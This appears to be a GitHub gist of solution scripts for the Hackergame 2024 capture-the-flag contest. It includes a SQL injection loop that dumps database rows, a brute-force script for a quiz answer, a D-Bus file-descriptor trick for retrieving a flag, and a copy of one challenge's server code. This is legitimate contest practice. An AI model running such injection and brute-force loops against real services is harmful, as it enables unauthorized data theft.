Last active
November 12, 2024 12:03
-
-
Save vifly/67e439ac69eff8c4c6ae94fe2ca92b15 to your computer and use it in GitHub Desktop.
Hackergame 2024 writeup code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
cookies = dict( | |
session="", | |
) | |
def crack(answer): | |
data = { | |
"q1": "3A204", | |
"q2": "2682", | |
"q3": "程序员的自我修养", | |
"q4": "336", | |
"q5": "6e90b6", | |
"q6": "", | |
} | |
data["q6"] = answer | |
r = requests.post("http://202.38.93.141:13030/", data=data, cookies=cookies) | |
if r.text.count("flag{") == 2: | |
print(r.text) | |
exit() | |
for i in range(1750, 1900): | |
print(i) | |
crack(str(i)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#define _GNU_SOURCE | |
#include <sys/mman.h> | |
#include <sys/socket.h> | |
#include <fcntl.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include <unistd.h> | |
#include <gio/gio.h> | |
int main() { | |
int sv[2]; | |
socketpair(AF_UNIX, SOCK_STREAM, 0, sv); | |
write(sv[0], "Please give me flag2\n", 21); | |
GDBusConnection *connection; | |
GError *error = NULL; | |
// Connect to the session bus | |
connection = g_bus_get_sync(G_BUS_TYPE_SYSTEM, NULL, &error); | |
if (error) { | |
g_printerr("Error connecting to session bus: %s\n", error->message); | |
g_clear_error(&error); | |
return 1; | |
} | |
GUnixFDList *fd_list = g_unix_fd_list_new(); | |
gint fd_index = g_unix_fd_list_append(fd_list, sv[1], &error); | |
if (fd_index == -1) { | |
g_printerr("Error adding FD to GUnixFDList: %s\n", error->message); | |
g_clear_error(&error); | |
g_object_unref(fd_list); | |
return 1; | |
} | |
GVariant *parameters = g_variant_new("(h)", fd_index); | |
// Create a D-Bus message for method invocation | |
GDBusMessage *message = g_dbus_message_new_method_call( | |
"cn.edu.ustc.lug.hack.FlagService", // destination bus name | |
"/cn/edu/ustc/lug/hack/FlagService", // object path | |
"cn.edu.ustc.lug.hack.FlagService", // interface name | |
"GetFlag2" // method name | |
); | |
g_dbus_message_set_body(message, parameters); | |
g_dbus_message_set_unix_fd_list(message, fd_list); | |
// Send the message | |
GDBusMessage *response = g_dbus_connection_send_message_with_reply_sync( | |
connection, message, G_DBUS_SEND_MESSAGE_FLAGS_NONE, | |
-1, // timeout (use default) | |
NULL, NULL, &error); | |
if (response == NULL) { | |
g_printerr("Error sending message: %s\n", error->message); | |
g_clear_error(&error); | |
} else { | |
g_print("Message sent successfully, response received.\n"); | |
// Get the response body and print it | |
GVariant *response_body = g_dbus_message_get_body(response); | |
if (response_body) { | |
gchar *response_str = g_variant_print(response_body, TRUE); | |
g_print("Response: %s\n", response_str); | |
g_free(response_str); | |
} else { | |
g_print("No response body.\n"); | |
} | |
g_object_unref(response); | |
} | |
// Cleanup | |
g_object_unref(message); | |
g_object_unref(connection); | |
return 0; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import time | |
cookies = { | |
"session": "", | |
} | |
SESS = requests.session() | |
def crack(): | |
questions = SESS.post("http://202.38.93.141:12122/game", cookies=cookies, json={}) | |
print(questions.text) | |
questions_list = questions.json()["values"] | |
print(questions_list) | |
answers = [] | |
for q in questions_list: | |
if q[0] < q[1]: | |
answers.append("<") | |
elif q[0] > q[1]: | |
answers.append(">") | |
time.sleep(9) | |
r = SESS.post("http://202.38.93.141:12122/submit", json={"inputs": answers}) | |
print(r.json()) | |
crack() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
cookies = { | |
"session": "" | |
} | |
SESS = requests.session() | |
url = "https://<REPLACE_IT>.hack-challenge.lug.ustc.edu.cn:8443/view" | |
def crack(): | |
index = 0 | |
while True: | |
resp = SESS.get( | |
url, | |
params={ | |
"conversation_id": f"114514' OR 1=1 ORDER BY id LIMIT 1 OFFSET {index}--" | |
}, | |
cookies=cookies, | |
) | |
with open("./paolugpt.txt", "a") as f: | |
f.write(resp.text) | |
index = index + 1 | |
if resp.status_code != 200: | |
break | |
crack() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
import atexit, base64, flask, itertools, os, re | |
def crc(input: bytes) -> int: | |
poly, poly_degree = 'AaaaaaAaaaAAaaaaAAAAaaaAAAaAaAAAAaAAAaaAaaAaaAaaA', 48 | |
assert len(poly) == poly_degree + 1 and poly[0] == poly[poly_degree] == 'A' | |
flip = sum(['a', 'A'].index(poly[i + 1]) << i for i in range(poly_degree)) | |
digest = (1 << poly_degree) - 1 | |
for b in input: | |
digest = digest ^ b | |
for _ in range(8): | |
digest = (digest >> 1) ^ (flip if digest & 1 == 1 else 0) | |
return digest ^ (1 << poly_degree) - 1 | |
def hash(input: bytes) -> bytes: | |
digest = crc(input) | |
u2, u1, u0 = 0xCb4EcdfD0A9F, 0xa9dec1C1b7A3, 0x60c4B0aAB4Bf | |
assert (u2, u1, u0) == (223539323800223, 186774198532003, 106397893833919) | |
digest = (digest * (digest * u2 + u1) + u0) % (1 << 48) | |
return digest.to_bytes(48 // 8, 'little') | |
def xzrj(input: bytes) -> bytes: | |
pat, repl = rb'([B-DF-HJ-NP-TV-Z])\1*(E(?![A-Z]))?', rb'\1' | |
return re.sub(pat, repl, input, flags=re.IGNORECASE) | |
paths: list[bytes] = [] | |
xzrj_bytes: bytes = bytes() | |
with open(__file__, 'rb') as f: | |
for row in f.read().splitlines(): | |
row = (row.rstrip() + b' ' * 80)[:80] | |
path = base64.b85encode(hash(row)) + b'.txt' | |
with open(path, 'wb') as pf: | |
pf.write(row) | |
paths.append(path) | |
xzrj_bytes += xzrj(row) + b'\r\n' | |
def clean(): | |
for path in paths: | |
try: | |
os.remove(path) | |
except FileNotFoundError: | |
pass | |
atexit.register(clean) | |
bp: flask.Blueprint = flask.Blueprint('answer_a', __name__) | |
@bp.get('/answer_a.py') | |
def get() -> flask.Response: | |
return flask.Response(xzrj_bytes, content_type='text/plain; charset=UTF-8') | |
@bp.post('/answer_a.py') | |
def post() -> flask.Response: | |
wrong_hints = {} | |
req_lines = flask.request.get_data().splitlines() | |
iter = enumerate(itertools.zip_longest(paths, req_lines), start=1) | |
for index, (path, req_row) in iter: | |
if path is None: | |
wrong_hints[index] = 'Too many lines for request data' | |
break | |
if req_row is None: | |
wrong_hints[index] = 'Too few lines for request data' | |
continue | |
req_row_hash = hash(req_row) | |
req_row_path = base64.b85encode(req_row_hash) + b'.txt' | |
if not os.path.exists(req_row_path): | |
wrong_hints[index] = f'Unmatched hash ({req_row_hash.hex()})' | |
continue | |
with open(req_row_path, 'rb') as pf: | |
row = pf.read() | |
if len(req_row) != len(row): | |
wrong_hints[index] = f'Unmatched length ({len(req_row)})' | |
continue | |
unmatched = [req_b for b, req_b in zip(row, req_row) if b != req_b] | |
if unmatched: | |
wrong_hints[index] = f'Unmatched data (0x{unmatched[-1]:02X})' | |
continue | |
if path != req_row_path: | |
wrong_hints[index] = f'Matched but in other lines' | |
continue | |
if wrong_hints: | |
return {'wrong_hints': wrong_hints}, 400 | |
with open('answer_a.txt', 'rb') as af: | |
answer_flag = base64.b85decode(af.read()).decode() | |
closing, opening = answer_flag[-1:], answer_flag[:5] | |
assert closing == '}' and opening == 'flag{' | |
return {'answer_flag': answer_flag}, 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
input_file = "./answer_a.py" | |
new_content = [] | |
with open(input_file, "r") as f: | |
for l in f: | |
l = l.strip("\n") | |
new_content.append(l + " " * (80 - len(l)) + "\n") | |
with open("original_answer_a.py", "w") as f: | |
f.writelines(new_content) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment